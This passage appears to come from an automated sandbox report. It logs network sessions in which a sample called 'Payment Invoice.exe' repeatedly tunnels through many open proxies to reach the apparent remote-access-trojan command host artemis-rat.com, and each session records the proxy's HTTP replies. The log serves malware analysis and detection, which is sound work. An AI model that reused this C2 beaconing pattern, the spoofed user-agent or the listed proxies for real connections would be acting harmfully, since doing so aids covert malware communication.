                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.44982145.12.31.3807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.046132088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.200192928 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.449835104.17.84.150807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.070930958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.225342035 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.44976443.133.136.20888007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.080374002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.449843104.16.81.76807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.085930109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.240236044 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.44980867.43.228.253310337076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.107074022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.434592009 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.449837143.198.226.25807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.108722925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.279999018 CET803INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Server: Apache/2.4.57 (Ubuntu)
                                                                Content-Length: 611
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 69 6e 66 6f 40 70 6f 77 61 62 69 74 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at info@powabit.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.57 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.44979192.205.61.38241837076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.111861944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.792259932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.729886055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.621208906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.511653900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.323801041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.214546919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:36.823817015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:51.823638916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.449863185.162.229.127807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.123646975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.278131962 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.44979820.37.207.880807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.133300066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.446352005 CET72INHTTP/1.1 200 Connection established
                                                                Proxy-Agent: Fortinet-Proxy/1.0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.449787138.36.150.1610807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.141329050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.449875172.67.187.242807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.141812086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.296241045 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.44983972.10.160.171263157076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.147823095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.449884104.25.135.170807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.154021025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.308636904 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.449830184.181.217.19441457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.164484978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.449805212.231.197.2941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.165312052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.44980642.200.196.20880807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.172950029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.840018988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.776691914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.823875904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:40.248635054 CET72INHTTP/1.1 200 Connection Established
                                                                Proxy-Agent: Fortinet-Proxy/1.0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.44987751.75.126.150366947076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.178313017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.44985592.204.135.37550197076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.188747883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.44989351.75.126.150341447076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.198004007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                30192.168.2.44989951.75.126.150378477076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.205841064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                31192.168.2.449845147.75.92.25194017076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.210702896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.486479044 CET356INHTTP/1.0 502 Bad Gateway
                                                                Server: Zscaler/6.3
                                                                Content-Type: text/html
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                32192.168.2.449825193.239.56.8480817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.225136042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                33192.168.2.449880184.170.249.6541457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.228626966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                34192.168.2.44984615.236.106.23631287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.233120918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
